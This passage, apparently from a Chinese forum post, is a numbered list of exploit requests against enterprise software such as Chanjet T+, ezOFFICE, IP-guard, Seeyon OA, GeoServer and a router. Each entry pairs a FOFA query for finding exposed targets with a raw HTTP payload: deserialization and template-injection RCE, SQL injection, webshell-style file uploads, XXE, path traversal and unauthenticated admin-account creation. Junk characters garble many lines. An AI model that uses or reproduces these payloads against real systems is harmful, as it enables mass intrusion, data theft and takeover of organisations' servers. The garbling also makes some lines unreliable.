/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
* I5 Z1 Q) B3 N
/ m6 k" A6 J2 a. b, Z56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE6 m6 i" X" {6 y7 _
FOFA: app="畅捷通-TPlus") d* }1 ?2 j( w3 }
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1+ C4 m% m8 H1 N* l
Host: x.x.x.x/ |! F0 ^/ ?6 U; ]7 D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
: D! ]' S5 P) P' h3 c+ TContent-Type: application/json
- k, p8 R( L8 z3 ~( c. H: m1 x+ u
{
, q% T) u: ?  [3 o1 C  "storeID":{
; `  v- i- U7 b/ b0 z; F4 l% g) S    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",3 V; O# z/ T/ \7 n7 l/ Y$ V
   "MethodName":"Start",
1 Q0 w3 v" K! I2 ~    "ObjectInstance":{
8 \9 o5 o( {7 Q0 `% {       "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
( I/ F6 H3 I# {, R# Z        "StartInfo": {
+ F9 X8 E; h  S2 r           "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",( `! p4 o2 {( s% D7 ?. |
           "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
  k2 |7 [! U7 d3 @  e       }7 F8 |  d0 q( w- g9 D
    }! `, D& p, q# k' u. }( c
  }
' }1 K6 F9 n9 y, ^3 q* @' \# {9 ~) B}/ X3 T2 S' i5 w+ f$ r9 [
8 T, ?1 L3 S; ^
, C1 |* q# d. _' W4 u
57. 畅捷通T+ keyEdit.aspx SQL注入
0 D0 d3 W$ n! P' ?( S' T. k9 @& dFOFA:app="畅捷通-TPlus"( {! d8 @- A/ t# K
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.16 T" H& H' I+ R
Host: host- I  I- I  ~- J; X. t
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36( w! g" J$ W* v5 x
Accept-Charset: utf-8
/ A1 u3 E7 J" UAccept-Encoding: gzip, deflate
; Q) J5 ^/ h$ \1 d  VConnection: close7 K5 J, P0 K4 a0 p

* @0 d& P" b! }+ k& J/ I# g  e
- U6 _  ?4 w. a" E58. 畅捷通T+ KeyInfoList.aspx sql注入
" ~! P5 S* ^4 i/ _2 i% E2 T9 rFOFA:app="畅捷通-TPlus"
+ v/ k0 T2 p! I2 T8 zGET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1, s' n8 }, [* t1 T$ B$ |' L) @, {
Host: your-ip
9 K% a7 C8 Y7 E3 X/ T5 R9 b: TUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36& F& f' [1 `! D
Accept-Charset: utf-8
0 p$ \0 ]6 m( O) tAccept-Encoding: gzip, deflate
: W5 L% }, w' z; ?- qConnection: close& k6 F* w  M3 h

2 M% N3 c' W( F! W, @2 L8 Z8 ~
- D8 j6 r! e' z# \; ~59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
1 g( e' Z, l% f% W  b7 vFOFA: title="@XETUX" && title="XPOS" && body="BackEnd"3 l. f+ {) n( C, k4 e$ O8 [
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
2 b& F: |, C' h, _, O7 ]4 G' kHost: 192.168.86.128:9090
4 l7 X7 k) `2 P0 R0 ^/ K: {& iUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36, r: f7 Z+ V/ ?: Q* D6 x  M
Connection: close5 @( }# O# R! S; O  U/ E9 b
Content-Length: 16690 {. \/ v2 w5 F; g
Accept: */*
9 W$ V" z3 Q0 w0 d/ U5 |6 EAccept-Language: en: x& l0 Q2 ]8 f. _0 s1 G
Content-Type: application/x-www-form-urlencoded
  k' A- u+ n' Y4 `Accept-Encoding: gzip) A( B9 q6 F$ H3 b% g3 Q

9 w/ j6 U& P! A" F2 P% u" i" T0 kPAYLOAD
1 D9 ]! g# k+ S* {9 f0 T8 Q' J* o6 m4 \& u( m
  S- A/ [1 ]7 h( S6 a" V
60. 百卓Smart管理平台 importexport.php SQL注入4 o* H/ q) O4 {
FOFA:title="Smart管理平台"+ P# j. \9 ?( z1 a. F+ T
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1$ {* w! C7 z, N% s6 G; [0 D- z
Host:) ?9 W$ a) D, ^. s' c& }! C* @2 ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36: E0 g$ Q+ s) O/ `$ q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  _9 {+ C' `& K) }1 s* _$ M, T
Accept-Encoding: gzip, deflate" o1 H5 M1 A+ I6 A9 b& R* W
Accept-Language: zh-CN,zh;q=0.9
, J* [; A* a4 O8 J8 I/ cConnection: close3 X1 j4 T, C$ C# J2 F7 {/ o

' T! r( \+ f: E% Y/ Y
( e, s8 f# y$ X3 F+ M) P' |61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
0 P# D* d) q" j$ K( @FOFA: title="欢迎使用浙大恩特客户资源管理系统"0 o5 P& R1 g( V& ]' N; J8 [
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
6 c4 ?) j$ k% J/ HHost: x.x.x.x
* |5 P. a* O9 s5 VUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15. T# p* H( |4 |' Y. j
Connection: close/ K# m3 T0 G4 s# Y5 l7 a1 r
Content-Length: 27! }# c, ^) e/ D1 J8 P
Accept: */*
+ g: B6 a" e' J, a% @- a, s% jAccept-Encoding: gzip, deflate4 [4 Z1 `0 ^7 Z  W6 C7 J
Accept-Language: en0 V7 T+ Y& f4 T9 |9 t& y
Content-Type: application/x-www-form-urlencoded0 N1 Y/ ^, }) C8 Z6 f4 z: X0 K( S
: N% S5 f- a4 [1 f
8uxssX66eqrqtKObcVa0kid98xa2 t- P& G# g8 q% b/ V5 P
" m$ }: x) |9 v1 P2 Q+ [7 c$ C- {

/ s/ v' ?" ^2 J% K% `62. IP-guard WebServer 远程命令执行
4 C. M: |1 l. ZFOFA:"IP-guard" && icon_hash="2030860561"9 Q0 U% _' `  t. {' _
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
0 G* q! y( K. w* o5 U: oHost: x.x.x.x
5 y% E& `7 s& G/ V' \User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.362 K& q8 f8 h  r$ a6 E
Connection: close% l- ]  F" S' n0 S0 _
Accept: */*# `; `: N6 R0 N; Z
Accept-Language: en
4 S4 \. r# U% e' tAccept-Encoding: gzip
, K5 k/ c+ O% a! `& H# [, Y+ h# o; d- \0 R

6 M8 V2 g3 L$ T. y访问  [+ E) a7 Z$ K7 o( c
; P$ y& u( w7 v$ a
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
- S# _7 @* x( @- ^* B0 fHost: x.x.x.x1 G9 w) G6 U% g: f1 C1 @
9 N9 W- k& l4 W# u9 x8 `
9 b( S+ t5 x  j6 ^. V& e
63. IP-guard WebServer任意文件读取0 |# Y$ m7 _/ \+ i( r
IP-guard < 4.82.0609.0
" V* A/ w; f  V6 uFOFA:icon_hash="2030860561"
$ k6 Z% H! F' s+ ZPOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
3 u. V- V1 G/ M; ~; i9 c; S3 u: xHost: your-ip" X5 K1 G( n; V2 i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36% d$ G. W7 m- h5 e. S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
$ G! P& R3 s% z8 `/ q9 `0 F5 \( j8 eAccept-Encoding: gzip, deflate
8 f( o; R3 N. J) L' IAccept-Language: zh-CN,zh;q=0.9
5 f. s3 A& z7 N3 aConnection: close
- Z0 A$ t# d0 X" WContent-Type: application/x-www-form-urlencoded; p4 |, o% O% P& @! Z6 I

& ?, A# F- c" R; _# B3 u8 d" M7 rpath=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A& e& x- z2 \" Y, ]9 ^0 \3 f0 y& [( Y
8 p- u. R  x2 p3 m/ a! z2 s0 P9 t
64. 捷诚管理信息系统CWSFinanceCommon SQL注入3 N1 d/ W  }3 j+ \
FOFA:body="/Scripts/EnjoyMsg.js"+ k7 v& A% Y- Q( b
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.10 W/ H+ M, q0 v2 P( J
Host: 192.168.86.128:9001
! I4 Y6 ^4 c0 J/ \2 z" G9 h$ }User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
7 @" h% o$ ?: s8 Q6 B& r" R( s# B+ MConnection: close
  e! _' O& o/ w( J0 FContent-Length: 369
# t1 S" D: N+ KAccept: */*
( m$ Y( X* R6 [! q5 eAccept-Language: en
" Q! G7 R7 B) ?1 m! i. [Content-Type: text/xml; charset=utf-8
; J" K* {# ]+ M0 x5 O# v; ?$ J& nAccept-Encoding: gzip
& x! R* |: x* k7 f' C9 A( ^5 B; D3 W
5 |5 j1 w8 r8 s# \7 B; j<?xml version="1.0" encoding="utf-8"?>
4 o& ?1 Z! i0 ~4 J8 |, ^: R<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
. g$ K* c* o& d5 z<soap:Body>
$ _/ [! w6 f4 b. t1 h% {5 F2 h3 N    <GetOSpById xmlns="http://tempuri.org/">
# S& `( L; V' Y( Y( j      <sId>1';waitfor delay '0:0:5'--+</sId>
- _, a3 D7 Z2 Z- c    </GetOSpById>
1 b/ C* {7 ~5 h9 K1 `* w  </soap:Body>
4 I, q5 C+ H2 Z# E5 F</soap:Envelope>
& Q; U$ @' h( j3 e: d* r" a" L4 |( P' N! {
, Y! F7 W! o$ |$ A" ~9 T  e
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
8 H; e% E7 L# Z4 eFOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
5 `; \) ~! d/ m0 j响应200即成功创建账号test123456/123456+ n) W2 Q, n( v2 V; i" A
POST /SystemMng.ashx HTTP/1.1
1 `( H7 n, [5 m, U$ l6 C- V1 a$ G; DHost:6 ~/ |! G  V7 {, Q9 c3 u. J
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
5 V: V& i  b8 U# N/ x. a/ x5 wAccept-Encoding: gzip, deflate+ j+ @; [- s( J1 w& K- p$ }
Accept: */*3 Y! N, I$ Q% q* F/ E
Connection: close
+ t) }) y  Z9 g% f4 i4 j2 RAccept-Language: en+ R0 R0 Z1 @& C
Content-Length: 174  q5 {% m8 |9 m+ g1 U' X7 `' ]2 i/ z

& c: e% T% c* H# y* x' uoperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
8 ~5 J$ P1 K  ^. j3 \
! f, A* u  M" K! U( V
- G! {! o6 T, Q+ p. d66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入1 |- E$ y5 B* O' O
FOFA:app="万户ezOFFICE协同管理平台", c% v  t7 B, \  e) T! L6 i$ N
! p$ I/ C7 Z" i7 i
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.19 k, X, x7 Z  |5 U3 \* V  K  k
Host: x.x.x.x
) K2 w" `, e# V3 G* }/ s$ vUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
/ p7 x9 r5 p, g" P, _: z1 pConnection: close- n( i5 K2 t* p0 h
Accept: */*5 S8 \2 f/ S7 C$ }# k9 A4 M* D
Accept-Language: en8 H6 q6 I% y0 @6 M
Accept-Encoding: gzip- K, N" d" E$ J" s$ G
- a- [, n3 [5 U0 e/ U2 ]
, G; w0 ^  m$ X( Q! m
第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
: q, U6 A5 J8 h: B5 {
/ U5 f: \) V' [: ]67. 万户ezOFFICE wpsservlet任意文件上传. i  ~1 O: O: z$ y# B5 H
FOFA:app="万户网络-ezOFFICE"; D1 C! U! T0 f
newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
, ?' i1 Y( b! p, o" A  SPOST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1* l. Y% C; Q: @7 P6 a$ g2 d. A
Host: x.x.x.x
3 o1 c6 X) k! H7 DUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0, [; ?* g- k+ R: C, N5 N
Content-Length: 173# S8 C4 p: ?  ^7 d( j8 e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8. T+ h* U$ D( w6 C( C# a- M/ O
Accept-Encoding: gzip, deflate
8 M1 v3 k$ X$ fAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.38 S0 a" o6 z% T0 c# Q* q* y, [; N! b
Connection: close
, i, I" _- d$ y( E+ R- D6 [Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp: ~1 K9 n& u) s+ M: C: g" B) m4 Y
DNT: 10 c. q# f/ I0 w4 M: ], O
Upgrade-Insecure-Requests: 1* J- z+ k, V' u# a6 [! t

/ y  W9 ?( k* L+ Z) i- z--ufuadpxathqvxfqnuyuqaozvseiueerp9 m: \5 O2 H" ~; ^3 P
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
. {! K% Q* U) K. B
# o8 L! l9 J- S) W8 d<% out.print("sasdfghjkj");%>
7 f1 H- l0 X8 |/ C7 P0 s--ufuadpxathqvxfqnuyuqaozvseiueerp--
9 e( g: i9 i0 |, ]  ?1 m, E: j4 P8 G1 O* ^
# T# s! j; R2 c" w
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp2 `" M" d8 j1 O: q" n( T
' V/ o2 w; ^% M& {8 v# g
68. 万户ezOFFICE wf_printnum.jsp SQL注入
( s9 y; h2 t" c# i3 GFOFA:app="万户ezOFFICE协同管理平台"
8 \& E* y; r, S  s9 J5 p7 K- C7 ]GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.19 ?5 h6 @7 R; A0 H0 k3 A# L: I- r, y
Host: {{host}}
7 k5 C3 e1 s2 z; `/ `( f% VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36+ m  V. Q5 l9 u
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8! E) ]+ j# ~/ `: V* b) Y" @! A
Accept-Encoding: gzip, deflate- e1 N, n6 z. `
Accept-Language: zh-CN,zh;q=0.90 N% V# ]% @/ O$ K8 T2 ~
Connection: close8 D2 y  s: K4 `  d7 _

: I! [; ]) R  S) m/ D5 Z( a0 z
+ W( ]" K5 s4 G4 j( k7 o4 y" O69. 万户 ezOFFICE contract_gd.jsp SQL注入* S: k1 w0 m# _4 W4 J; |
FOFA:app="万户ezOFFICE协同管理平台"
' S! a! }" E- G1 SGET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
' J9 J5 w$ |3 K! p, WHost: your-ip* _# d7 H3 N9 \1 @4 ^9 p
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
) u4 p0 u) r0 [  D1 Y3 e% N2 SAccept-Encoding: gzip, deflate
2 ~$ x# [3 G, J/ Y* _9 K! aAccept: */*- n9 Q6 b, g. e) K/ X
Connection: keep-alive  c6 p$ s) k% R9 S* ~! e# q

8 H, n" I/ X% V# d  j9 u  o4 E. C( p7 L( ^0 f2 E( Q& I* O/ M, b9 R" M
70. 万户ezEIP success 命令执行
' K1 q9 s! c8 W  ?- C) ~* M- cFOFA:app="万户网络-ezEIP"
5 j* K* L0 u* f+ _9 iPOST /member/success.aspx HTTP/1.1
4 K6 Z# P, \: V; X/ r& zHost: {{Hostname}}2 J4 ?) Q) z- M- s- W, d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.360 o% C: p2 B) h6 i
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
2 a! D5 D# Z: K/ J' r% B8 LContent-Type: application/x-www-form-urlencoded
; ^! [( }4 v  G, t6 U" nTYPE: C: C# J8 H( V4 |2 C$ L( D5 I
Content-Length: 16702! b, ^" j; n/ E
9 b5 }) ~& n$ M" g9 Z
__VIEWSTATE=PAYLOAD& u$ C5 m4 Z, o5 \$ Z
2 h4 n4 y$ a3 G; A
7 X6 }4 A. A, M
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
$ v( f$ z: l$ e+ PFOFA:body="PM2项目管理系统BS版增强工具.zip"
; F! I- q3 K/ @7 _GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
" h4 l2 c/ o1 l: h+ NHost: x.x.x.xx.x.x.x) t, j" X$ e  \2 o
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36: G" \% Y/ y0 ]! V
Connection: close+ S2 T5 c6 A- N3 o1 N: N) k9 K
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8) v  O. U% q4 v  ]; I# s; I
Accept-Encoding: gzip, deflate
# W$ u- n3 ^* V. v" qAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. M- w' W/ r, L, ^) o3 C, D$ b7 `Upgrade-Insecure-Requests: 1
  K7 H) w. e! Y5 |. L9 f  O+ M; v; z% N5 v& t

9 w6 D8 q9 u4 d; A$ f3 s72. 致远OA getAjaxDataServlet XXE
; @/ i  I/ @- J6 TFOFA:app="致远互联-OA"
( ?% T% ^8 f# ?$ B" S8 Y1 mPOST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
9 K6 H. a6 Z- EHost: 192.168.40.131:8099) }0 M8 j' ~! o3 K0 ~+ m7 ]7 W
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
4 N1 K; i7 v/ N# _8 [& _- _Connection: close0 L6 i+ R& F' Y5 `/ D% l8 G
Content-Length: 583; b* d3 s- \/ S6 ]5 L9 k) e
Content-Type: application/x-www-form-urlencoded
  P# {' z8 ]  V% ?6 pAccept-Encoding: gzip
+ t5 j! @$ {# ~" s7 Y; E3 @5 k& C
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E  S8 v6 K# A- V! A! q3 p2 d+ |

& N, H; [8 l% o+ P$ F# X; _
; P) L9 c$ b( D4 u( w5 B$ U73. GeoServer wms远程代码执行% k4 E5 v$ i$ i
FOFA:icon_hash=”97540678”, {' _9 x: f8 s, P: G
POST /geoserver/wms HTTP/1.1, _0 Z. f; ]: o6 O; E0 g0 \! [8 T
Host:$ _+ C/ s$ [9 |$ i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
  W2 h3 f1 c  N1 V) dContent-Length: 1981. l5 v: ?* F2 T! k  C
Accept-Encoding: gzip, deflate
0 J& h' p1 h  J* T. `! xConnection: close( L  r# U9 e- @$ G# v8 z) U
Content-Type: application/xml
9 C( y: A) Y7 Y% [* m! J) T, RSL-CE-SUID: 3) v  M$ I" y8 A% E7 c; X

' E) v# a- k" [+ f/ s" g6 G& MPAYLOAD
) C; u7 F$ o" H& u
- G/ L' i, {0 C8 [; {7 O8 V
5 x# |' `7 d/ j74. 致远M3-server 6_1sp1 反序列化RCE# ^. b6 C8 c# X$ p' j( j! r
FOFA:title="M3-Server"
# L2 V9 Z6 U5 ?8 y/ C3 a' ^+ rPAYLOAD
, F6 V2 |. f, I! h1 H3 t& J5 i# N! d; p# x% J3 L1 Z- s& H
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE: r2 g, z+ x# |% u3 g
FOFA:app="TELESQUARE-TLR-2005KSH"
$ \  S: j1 t$ r1 r3 g, C: ZGET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
9 Y+ O; r' O* L; }) oHost: x.x.x.x3 j) e7 t4 G  e6 n) z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36( r% c  \4 f% T: E+ T6 o# b( l
Connection: close8 W. _+ H9 U3 H
Accept: */*
( g, n1 u! X" z# s0 U( x4 dAccept-Language: en
  J! d; b2 B% k  gAccept-Encoding: gzip
0 a  v: Z8 n3 S" w
2 I8 j0 X) m6 O8 f# f+ j
% K- g' q( ~3 \/ U4 c* KGET /cgi-bin/test28256.txt HTTP/1.1
. |& \% j" B& x% e* X) ^; QHost: x.x.x.x
# V6 n0 n5 \' [' Y0 x8 r; O; W3 S! l! N1 v5 ^  }6 v5 \, x6 ^

- v. }1 O& D6 u+ M76. 新开普掌上校园服务管理平台service.action远程命令执行# Q# x: E* W9 [( E
FOFA:title="掌上校园服务管理平台"4 G: ]* G; R8 e
POST /service_transport/service.action HTTP/1.1
) W) o1 f6 I( Z2 @5 d; t4 lHost: x.x.x.x
$ o$ u5 x# b2 h# `* z. c1 qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.06 J) g: ~& ~8 U1 r0 q8 N% l6 @
Connection: close
* r. E" G+ \* `4 U+ B2 H$ W' JContent-Length: 211) ]5 a; q* }/ v1 n$ A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
: N6 e. m/ X/ N, z! VAccept-Encoding: gzip, deflate
9 h" `. ?# `8 ~5 ]' s4 ]Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 D+ C) e9 v* @/ c% Z$ R2 I! oCookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
( {* j0 G0 f3 qUpgrade-Insecure-Requests: 1
& L+ X1 q; s  i, I& V2 A: M' J% n- |& T& {: ?$ Z& ?# E0 U
{
6 Z# f4 ^8 e) D" Y2 T: W"command": "GetFZinfo",( O/ B, X! ~, |5 }$ b% r* c4 H/ ]6 H
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"* G7 l3 v2 y& U9 f
  ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
8 U7 w0 O, X  S# p( S9 d}) A& s, ]+ Y% O8 C, u" c4 ?
: v7 G6 D6 @! N/ C5 X& i8 c1 Q
8 ]7 ]- l( O& H1 c4 p8 l/ \" r
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.12 F! N8 l1 g6 O% t$ R! w
Host: x.x.x.x% b4 E# E; X+ f8 [
  w( x# E1 ?8 L, Y
4 M- c" X! B3 v9 Y! s0 {
: F% ~0 j) n, U/ O* C
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
8 x& z4 ^! s" c) R& bFOFA:body="F22WEB登陆": V7 x# X: b& l6 h: s0 B1 ]
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
" u+ G; g2 {# E0 i0 fHost: x.x.x.x
5 l4 u8 L' K. G. RUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
" B& Y: O( S* ?% S2 }Connection: close9 L! u! I5 Z* @$ F7 x; M7 E9 y
Content-Length: 4330 G9 p) E4 z7 W) M( ^9 E/ n
Accept: */*: @! q5 w; G7 \. J# i
Accept-Encoding: gzip, deflate
/ |% |. R1 s: n9 G. ?. M) UAccept-Language: zh-CN,zh;q=0.9/ K# b* x) _% O% h7 ~" t5 n
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
. d+ u- Q& a# Q! ^
  x+ f1 r( f4 L6 M' @' f------------398jnjVTTlDVXHlE7yYnfwBoix
1 O0 J0 }- T- S7 ?Content-Disposition: form-data; name="folder"5 ~* h0 A! C8 H; @
- ^/ E2 {, O0 |+ v
/upload/udplog6 m$ B8 N1 e0 W. p' V
------------398jnjVTTlDVXHlE7yYnfwBoix5 V4 s3 ~% n/ ]5 P7 u: L
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
! W* W. ~, p' a3 [' w9 FContent-Type: application/octet-stream! o2 t9 ^  X0 a- l# y+ ^6 t4 z
% ?% g# ~3 g$ E" C1 l5 q
hello1234567
$ v3 v% `* [2 C' M7 x$ R------------398jnjVTTlDVXHlE7yYnfwBoix
0 e* f6 z" Z4 u4 P& i8 m" FContent-Disposition: form-data; name="Upload"
! ~" n: f* Y3 z5 c
8 b6 l% f9 m9 v8 M: k# e! b0 ?Submit Query
& R' k& W9 j; b" v) N6 _/ P------------398jnjVTTlDVXHlE7yYnfwBoix--  W: k: S# S6 I. b8 k9 H1 e

& O) T5 N, c& g
; _9 H/ h* H2 ^/ R2 O78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
8 K  P3 S1 o3 o" e9 aFOFA:icon_hash="2001627082"2 f0 Z$ c, K5 ]" Q( B1 M" j  e) L
POST /Platform/System/FileUpload.ashx HTTP/1.1# K- o( _4 p$ a8 k% E! T2 l7 G
Host: x.x.x.x1 u8 h" n! ?5 r' z5 B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
0 v: W0 J1 K. ^+ I$ D3 Z3 k% W0 ~: mConnection: close
